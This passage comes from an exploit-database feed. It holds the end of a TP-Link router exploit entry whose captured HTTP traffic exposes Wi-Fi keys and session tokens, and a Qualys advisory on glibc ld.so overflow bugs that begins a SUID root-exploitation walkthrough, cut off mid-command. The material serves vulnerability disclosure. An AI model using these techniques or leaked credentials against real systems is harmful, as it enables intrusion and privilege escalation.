\"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 268,\r\n \"dns\": 250,\r\n \"connect\": 524,\r\n \"send\": 0,\r\n \"wait\": 748,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:39.644+03:00\",\r\n \"time\": 997,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.01,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 272,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 701,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:39.647+03:00\",\r\n \"time\": 1835,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 270,\r\n \"dns\": 251,\r\n \"connect\": 521,\r\n \"send\": 0,\r\n \"wait\": 785,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n }\r\n ]\r\n }\r\n}\r\n\r\n# You want to follow my activity ?\r\n\r\nhttps://www.linkedin.com/in/ismailtasdelen\r\nhttps://github.com/ismailtasdelen\r\nhttps://packetstormsecurity.com/user/ismailtasdelen\n\n# 0day.today [2018-07-24] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30759"}, {"lastseen": "2018-04-02T09:35:47", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category local exploits", "modified": "2017-12-14T00:00:00", "published": "2017-12-14T00:00:00", "href": "https://0day.today/exploit/description/29207", "id": "1337DAY-ID-29207", "title": "glibc ld.so - Memory Leak / Buffer Overflow Vulnerability", "type": "zdt", "sourceData": "Qualys Security Advisory\r\n \r\nBuffer overflow in glibc's ld.so\r\n \r\n \r\n========================================================================\r\nContents\r\n========================================================================\r\n \r\nSummary\r\nMemory Leak\r\nBuffer Overflow\r\nExploitation\r\nAcknowledgments\r\n \r\n \r\n========================================================================\r\nSummary\r\n========================================================================\r\n \r\nWe have discovered a memory leak and a buffer overflow in the dynamic\r\nloader (ld.so) of the GNU C Library (glibc):\r\n \r\n- the memory leak (CVE-2017-1000408) first appeared in glibc 2.1.1\r\n (released on May 24, 1999) and can be reached and amplified through\r\n the LD_HWCAP_MASK environment variable;\r\n \r\n- the buffer overflow (CVE-2017-1000409) first appeared in glibc 2.5\r\n (released on September 29, 2006) and can be triggered through the\r\n LD_LIBRARY_PATH environment variable.\r\n \r\nFurther investigation showed that:\r\n \r\n- the buffer overflow is not exploitable if\r\n /proc/sys/fs/protected_hardlinks is enabled (it is not enabled by\r\n default on vanilla Linux kernels, but most Linux distributions turn it\r\n on by default);\r\n \r\n- the memory leak and the buffer overflow are not exploitable if the\r\n glibc is patched against CVE-2017-1000366, because this patch ignores\r\n the LD_HWCAP_MASK and LD_LIBRARY_PATH environment variables when SUID\r\n binaries are executed (CVE-2017-1000366 was first patched in glibc\r\n 2.26, released on August 2, 2017, but most Linux distributions had\r\n already backported this patch on June 19, 2017).\r\n \r\nWe have therefore rated the impact of these vulnerabilities as Low.\r\nNevertheless, we give a brief analysis of the vulnerable function, and\r\npresent a simple method for exploiting a SUID binary on the command line\r\nand obtaining full root privileges (if /proc/sys/fs/protected_hardlinks\r\nis not enabled, and CVE-2017-1000366 is not patched).\r\n \r\n \r\n========================================================================\r\nMemory Leak (CVE-2017-1000408)\r\n========================================================================\r\n \r\n------------------------------------------------------------------------\r\nAnalysis\r\n------------------------------------------------------------------------\r\n \r\nIn _dl_init_paths(), ld.so malloc()ates \"rtld_search_dirs.dirs[0]\", a\r\ncache of information about the system's trusted directories (typically\r\n\"/lib\" and \"/usr/lib\" on 32-bit or \"/lib64\" and \"/usr/lib64\" on 64-bit).\r\nTo compute the number of system directories, ld.so uses the classic C\r\nidiom \"sizeof (system_dirs) / sizeof (system_dirs[0])\":\r\n \r\n 691 rtld_search_dirs.dirs[0] = (struct r_search_path_elem *)\r\n 692 malloc ((sizeof (system_dirs) / sizeof (system_dirs[0]))\r\n 693 * round_size * sizeof (struct r_search_path_elem));\r\n \r\nUnfortunately, \"system_dirs\" is not a classic array: it is not an array\r\nof strings (pointers to characters), but rather an array of characters,\r\nthe concatenation of all system directories, separated by null bytes:\r\n \r\n 109 static const char system_dirs[] = SYSTEM_DIRS;\r\n \r\nwhere \"SYSTEM_DIRS\" is generated by \"gen-trusted-dirs.awk\" (typically\r\n\"/lib/\\0/usr/lib/\" on 32-bit or \"/lib64/\\0/usr/lib64/\" on 64-bit). As a\r\nresult, the number of system directories is overestimated, and too much\r\nmemory is allocated for \"rtld_search_dirs.dirs[0]\": if \"system_dirs\" is\r\n\"/lib/\\0/usr/lib/\" for example, the number of system directories is 2,\r\nbut 16 is used instead (the number of characters in \"system_dirs\") to\r\ncompute the size of \"rtld_search_dirs.dirs[0]\".\r\n \r\nThis extra memory is never accessed, never freed, and mostly filled with\r\nnull bytes, because only the information about \"nsystem_dirs_len\" system\r\ndirectories (the correct number of system directories) is written to\r\n\"rtld_search_dirs.dirs[0]\", and because the minimal malloc()\r\nimplementation in ld.so calls mmap(), but never munmap().\r\n \r\nMoreover, this memory leak can be amplified through the LD_HWCAP_MASK\r\nenvironment variable, because ld.so uses \"ncapstr\" (the total number of\r\nhardware-capability combinations) to compute the size of\r\n\"rtld_search_dirs.dirs[0]\":\r\n \r\n 687 round_size = ((2 * sizeof (struct r_search_path_elem) - 1\r\n 688 + ncapstr * sizeof (enum r_dir_status))\r\n 689 / sizeof (struct r_search_path_elem));\r\n \r\n------------------------------------------------------------------------\r\nHistory\r\n------------------------------------------------------------------------\r\n \r\nWe tracked down this vulnerability to:\r\n \r\ncommit ab7eb292307152e706948a7b19164ff5e6d593d4\r\nDate: Mon May 3 21:59:35 1999 +0000\r\n \r\n Update.\r\n \r\n * elf/Makefile (trusted-dirs.st): Use gen-trusted-dirs.awk.\r\n * elf/gen-trusted-dirs.awk: New file.\r\n * elf/dl-load.c (systems_dirs): Moved into file scope. Initialize\r\n from SYSTEM_DIRS macro.\r\n (system_dirs_len): New variable. Contains lengths of system_dirs\r\n strings.\r\n (fillin_rpath): Rewrite for systems_dirs being a simple string.\r\n Improve string comparisons. Change parameter trusted to be a flag.\r\n Change all callers.\r\n (_dt_init_paths): Improve using new format for system_dirs.\r\n \r\nwhich transformed \"system_dirs\" from an array of strings (pointers to\r\ncharacters) into an array of characters:\r\n \r\n- static const char *system_dirs[] =\r\n- {\r\n-#include \"trusted-dirs.h\"\r\n- NULL\r\n- };\r\n...\r\n+static const char system_dirs[] = SYSTEM_DIRS;\r\n \r\n \r\n========================================================================\r\nBuffer Overflow (CVE-2017-1000409)\r\n========================================================================\r\n \r\n------------------------------------------------------------------------\r\nAnalysis\r\n------------------------------------------------------------------------\r\n \r\nIn _dl_init_paths(), ld.so computes \"nllp\", the number of\r\ncolon-separated directories in \"llp\" (the LD_LIBRARY_PATH environment\r\nvariable), malloc()ates \"env_path_list.dirs\", an array of \"nllp + 1\"\r\npointers to \"r_search_path_elem\" structures (one for each directory in\r\n\"llp\", plus a terminating NULL pointer), and calls fillin_rpath() to\r\nfill in \"env_path_list.dirs\":\r\n \r\n 777 if (llp != NULL && *llp != '\\0')\r\n 778 {\r\n 779 size_t nllp;\r\n 780 const char *cp = llp;\r\n 781 char *llp_tmp;\r\n ...\r\n 803 nllp = 1;\r\n 804 while (*cp)\r\n 805 {\r\n 806 if (*cp == ':' || *cp == ';')\r\n 807 ++nllp;\r\n 808 ++cp;\r\n 809 }\r\n 810 \r\n 811 env_path_list.dirs = (struct r_search_path_elem **)\r\n 812 malloc ((nllp + 1) * sizeof (struct r_search_path_elem *));\r\n ...\r\n 819 (void) fillin_rpath (llp_tmp, env_path_list.dirs, \":;\",\r\n 820 __libc_enable_secure, \"LD_LIBRARY_PATH\",\r\n 821 NULL, l);\r\n \r\nUnfortunately, ld.so parses the \"llp\" string to compute \"nllp\" but\r\nparses the \"llp_tmp\" string (an expanded copy of \"llp\") to fill in\r\n\"env_path_list.dirs\". As a result, the number of pointers written to\r\n\"env_path_list.dirs\" can be greater than \"nllp + 1\" (an mmap()-based\r\nbuffer overflow) if the contents of \"llp_tmp\" differ from the contents\r\nof \"llp\" (if \"llp_tmp\" contains more colons than \"llp\"):\r\n \r\n 784 /* Expand DSTs. */\r\n 785 size_t cnt = DL_DST_COUNT (llp, 1);\r\n 786 if (__glibc_likely (cnt == 0))\r\n 787 llp_tmp = strdupa (llp);\r\n 788 else\r\n 789 {\r\n 790 /* Determine the length of the substituted string. */\r\n 791 size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n 792 \r\n 793 /* Allocate the necessary memory. */\r\n 794 llp_tmp = (char *) alloca (total + 1);\r\n 795 llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n 796 }\r\n \r\nThe Dynamic String Tokens (DSTs) $LIB and $PLATFORM are expanded to\r\nfixed strings that do not contain colons (typically \"lib\" and \"i686\" on\r\n32-bit or \"lib64\" and \"x86_64\" on 64-bit), but the expansion of $ORIGIN\r\n(the directory of the binary being executed) can inject extra colons\r\ninto \"llp_tmp\" and hence extra pointers into \"env_path_list.dirs\".\r\n \r\nTo exploit this buffer overflow, a local attacker must therefore be able\r\nto:\r\n \r\n- hard-link a SUID binary into a directory whose pathname contains\r\n colons (i.e., /proc/sys/fs/protected_hardlinks must not be enabled);\r\n \r\n- pass the LD_LIBRARY_PATH environment variable to _dl_init_paths()\r\n (i.e., CVE-2017-1000366 must not be patched).\r\n \r\n------------------------------------------------------------------------\r\nHistory\r\n------------------------------------------------------------------------\r\n \r\nWe tracked down this vulnerability to:\r\n \r\ncommit 950398e1320255572f4228db94344dcd5f613455\r\nDate: Tue Aug 29 01:44:27 2006 +0000\r\n \r\n * elf/dl-load.c (_dl_init_paths): Expand DSTs.\r\n \r\nwhich added the expansion of llp's Dynamic String Tokens (DSTs) to\r\n_dl_init_paths():\r\n \r\n- char *llp_tmp = strdupa (llp);\r\n+ char *llp_tmp;\r\n...\r\n+ /* Expand DSTs. */\r\n+ size_t cnt = DL_DST_COUNT (llp, 1);\r\n+ if (__builtin_expect (cnt == 0, 1))\r\n+ llp_tmp = strdupa (llp);\r\n+ else\r\n+ {\r\n+ /* Determine the length of the substituted string. */\r\n+ size_t total = DL_DST_REQUIRED (l, llp, strlen (llp), cnt);\r\n+\r\n+ /* Allocate the necessary memory. */\r\n+ llp_tmp = (char *) alloca (total + 1);\r\n+ llp_tmp = _dl_dst_substitute (l, llp, llp_tmp, 1);\r\n+ }\r\n \r\n \r\n========================================================================\r\nExploitation\r\n========================================================================\r\n \r\n------------------------------------------------------------------------\r\nDebian 9 (i386)\r\n------------------------------------------------------------------------\r\n \r\nIn this example, we exploit the SUID-root binary \"su\" on a 32-bit Debian\r\n9.0: we installed \"debian-9.0.0-i386-xfce-CD-1.iso\" (the last release\r\nbefore glibc's CVE-2017-1000366 was patched), and manually disabled\r\nprotected_hardlinks (\"echo 0 > /proc/sys/fs/protected_hardlinks\").\r\n \r\n1/ First, we identify the system's trusted directories (the only\r\ndirectories accepted by fillin_rpath() when executing a SUID binary):\r\n \r\n$ env -i LD_PRELOAD=nonexistent LD_HWCAP_MASK=0 LD_DEBUG=libs env 2>&1 | head\r\n 1607: find library=nonexistent [0]; searching\r\n 1607: search cache=/etc/ld.so.cache\r\n 1607: search 